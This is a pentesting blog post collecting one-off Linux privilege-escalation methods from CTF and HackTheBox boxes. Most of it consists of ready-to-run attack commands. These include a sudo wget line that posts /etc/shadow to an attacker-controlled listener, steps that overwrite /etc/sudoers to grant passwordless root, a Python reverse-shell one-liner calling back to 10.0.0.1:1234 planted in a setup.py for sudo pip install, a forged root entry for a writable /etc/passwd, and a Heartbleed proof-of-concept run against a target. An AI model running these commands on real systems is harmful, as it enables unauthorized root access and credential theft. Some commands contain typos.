Unique Priv-Esc Methods
I will be adding to this post occasionally, but the purpose of this post is to cover one-off privilege escalation methods found in the wild that are too specific to be covered in a dedicated post. If you find any unique methods please let me know in the contact form.
TMUX socket running as root
If the TMUX session is running as root, attach to the session and run any commands you’d like as root. You can run the history command as well to get more info about how the TMUX session was started.
# List out TMUX sessionstmux ls# Attach to TMUX sessiontmux -S /.devs/dev_sess
Reading deleted files off mounted drive
In a HackTheBox machine called Mirai, you needed to mount a USB storage device and recover the contents using the strings command. The root flag was in the last location.
# List out filesystemsdf -lh# Navigate to the drivecd /media/usbstick/# Use strings to view contents of other drivestrings /dev/sdb# Or we can use debugfs to view the contentsdebugfs /dev/sda1
Heartbleed credential leak
You can use the Heartbleed bug to extract credentials from a server.
# Download POC from https://github.com/sensepost/heartbleed-poc# Run the python script against the server to view outputpython heartbleed-poc.py <target_ip_address>
Wget with root privileges
Technically this technique could fall under my Abusing SUDO article, but I thought it was interesting so I put it here. Essentially, if you run sudo -l and you see that you can run wget with sudo privileges, you can do quite a few things since wget can get and send files:
# Sending files to our netcat listener on 10.10.10.99:sudo wget --post-file=/etc/shadow 10.10.10.99# Our listener can be run by using "nc -nvlp 80"----------# Download /etc/sudoers file to our machine with a netcat listner:sudo wget --post-file=/etc/sudoers 10.10.10.99# Edit the file so the user we are imitading has (root) NOPASSWD: ALL permissions# Download the file back to the target machine and it'll overwrite the original sudoers file:sudo wget 10.10.10.99/modified_sudoers --output-docuemtn=/etc/sudoers# Run "sudo su" to get rootsudo su
Non-tty shell
This one is kinda vague and it may be a little “CTF-like”, but the idea is that some shells that aren’t TTY, may have some escape sequences that can be found using the man-page:
# Check man pageman <shell_name># Read through the man page and see if there are any escape sequences:!/bin/sh# The command above may or may not work but it's an example of just one escape sequence.
World writable /etc/passwd file
This one will never be on a server by default because the permissions -rw-rw-rw are not the default for the /etc/passwd file, but you may find it in some labs and CTF boxes.
# On Kali machine, create a new hash for a new user "bob"root@kali:$ openssl passwd -lpassword:Verifying - Password:$1$nMgWTHVG$RngZLV/8YdusVQDL0Qe9E.# Now write this new entry into the /etc/passwd file for user "bob"bob:$1$nMgWTHVG$RngZLV/8YdusVQDL0Qe9E.:0:0:bob:/root:/bin/bash# Get a root shellsu - bob
pip install with sudo
If we have sudo privileges to run pip install, after checking with sudo -l, we can create a file called setup.py and include our reverse shell below in it:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'On our computer we have a netcat listener using nc -nvlp 1234. Now we run our pip install . command and we can get a root shell:
sudo pip install .Steganography
Steganography is the hiding of information within another file. This subject has so many other resources out there for how to file hidden files within files and images. But just know that some images and files may be hiding information that you can’t initially see. I will point you to some resources that I have found helpful:
